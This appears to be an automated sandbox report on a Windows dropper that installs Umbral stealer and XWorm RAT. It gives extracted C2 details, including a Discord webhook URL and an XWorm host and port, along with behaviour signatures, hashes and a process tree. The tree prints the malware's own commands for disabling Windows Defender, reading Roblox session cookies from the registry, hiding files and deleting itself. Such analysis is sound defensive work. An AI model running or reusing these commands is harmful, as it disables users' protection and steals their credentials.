Analysis

  • max time kernel
    43s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2024 19:28

General

  • Target

    94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe

  • Size

    1.9MB

  • MD5

    477ee009f176249987f15c8fd01902f0

  • SHA1

    c40e6e81adcca5bf643ea005e3e2bc062793985d

  • SHA256

    94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8

  • SHA512

    aef7538f615ec5607f56f41f17ad045a4ac8bba6e7a27e185068208a7ea704c01b1b87aaae0b5cb42f2e61ee11dd344e01c2f8d2d089a026e14931935da6dfef

  • SSDEEP

    24576:IRDdNQlDWcG0ZbOOdezYwITkHiPIZp7WAvck0poRtf0BJngtcp90kcTFI8A+W4+u:IRDTQRzMKeEcHLZkA0ruJd/

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1322985421172641892/q0_diVrV3tWC0qMrnQumssRXcZ18yaPSUtiPWfKvRg2S6sXoeNRQ-lKC87d8pURrSvkv

Extracted

Family

xworm

Version

5.0

C2

were-breeding.gl.at.ply.gg:1234

Mutex

ecqG44OAn0ybERsL

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe
    "C:\Users\Admin\AppData\Local\Temp\94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Users\Admin\AppData\Local\Temp\KNA SERVICE.EXE
      "C:\Users\Admin\AppData\Local\Temp\KNA SERVICE.EXE"
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Maps connected drives based on registry
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1140
        3⤵
        • Loads dropped DLL
        • Program crash
        PID:3048
    • C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE
      "C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RUN ME.EXE'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows defender control'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows defender control'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:444
    • C:\Users\Admin\AppData\Local\Temp\SSS.EXE
      "C:\Users\Admin\AppData\Local\Temp\SSS.EXE"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\SSS.EXE"
        3⤵
        • Views/modifies file attributes
        PID:2440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSS.EXE'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1084
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3040
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2296
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:580
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:1316
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\SSS.EXE" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:2136
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2944

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\KNA SERVICE.EXE

        Filesize

        1.5MB

        MD5

        d3fbde93141444735fb5ea06e1371213

        SHA1

        f25eed8c6bf09ba4b1ce60b6ee72d5e36bf9a4f2

        SHA256

        ed8b9422f74d4dc9ec9a55cabedc04c819a13eaeba5b7ddade5e3d5200337816

        SHA512

        553ee6d8ac6d2faa55b0bbb5b97d1ac7cad0dfb1ebf8e2e30f87c881478309a4e0ed0f98285b334ad244be2243ee2b067cb267ce5054ca119d34ae224df65e31

      • C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE

        Filesize

        38KB

        MD5

        816ae2a8f7799541016e947b09286035

        SHA1

        c34cf31168b08a7ae66cafbbbd5570d7d72cab2b

        SHA256

        75a03d5602e8eab0d7013319781dd0b44133fffb50ad5783b5d8224a63265e6d

        SHA512

        7d76cb89386c998e922e38507a931daf4e62a335ff5f1bb9731efd0c1a279efa1ee51bb424f8089b1019dceb2121d379a3f1ef5ab00163a13df6f3efd571039e

      • C:\Users\Admin\AppData\Local\Temp\SSS.EXE

        Filesize

        229KB

        MD5

        482265beef9bef7b8def0d9e793a8470

        SHA1

        6de3fb6bef13732a226f3b4bcde1c4f8f0b79881

        SHA256

        1da02f46310578bf95267665f964c6c79617e6fd5f3926c53aad40529782750e

        SHA512

        6c6c5d528243895426e7d04ab4fb9af2ce54c7286f25a602e793a034692035c86f832548149d24eee5ce4e4d7f77347361e8ebfe972eb9a826245cff0b7dac8c

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        315116efaeebda9ccf2616fe94e37684

        SHA1

        922d6f07ba02cb8def157e6de96472652351cd6f

        SHA256

        2bc61be4147b789c1d424aa1baa18e64fd6c18cdca4091252e7998080ab386ba

        SHA512

        3fac06525ce9525d950cfff93eab4eab174e1f9da254fcaeb142ce62bb115395a5b31a9bed1d5e123dc85d21a3e51838c64387a0620ac3914b6afb6fa737f56f

      • memory/580-93-0x0000000001D20000-0x0000000001D28000-memory.dmp

        Filesize

        32KB

      • memory/1380-41-0x000000001B610000-0x000000001B8F2000-memory.dmp

        Filesize

        2.9MB

      • memory/1380-42-0x0000000001C00000-0x0000000001C08000-memory.dmp

        Filesize

        32KB

      • memory/2704-23-0x0000000000400000-0x000000000040A000-memory.dmp

        Filesize

        40KB

      • memory/2704-24-0x0000000000400000-0x000000000040A000-memory.dmp

        Filesize

        40KB

      • memory/2704-22-0x0000000005030000-0x000000000519A000-memory.dmp

        Filesize

        1.4MB

      • memory/2704-21-0x0000000001150000-0x00000000012E2000-memory.dmp

        Filesize

        1.6MB

      • memory/2788-19-0x0000000000C50000-0x0000000000C60000-memory.dmp

        Filesize

        64KB

      • memory/2872-34-0x000000001B6A0000-0x000000001B982000-memory.dmp

        Filesize

        2.9MB

      • memory/2872-35-0x0000000001D20000-0x0000000001D28000-memory.dmp

        Filesize

        32KB

      • memory/2932-20-0x0000000000380000-0x00000000003C0000-memory.dmp

        Filesize

        256KB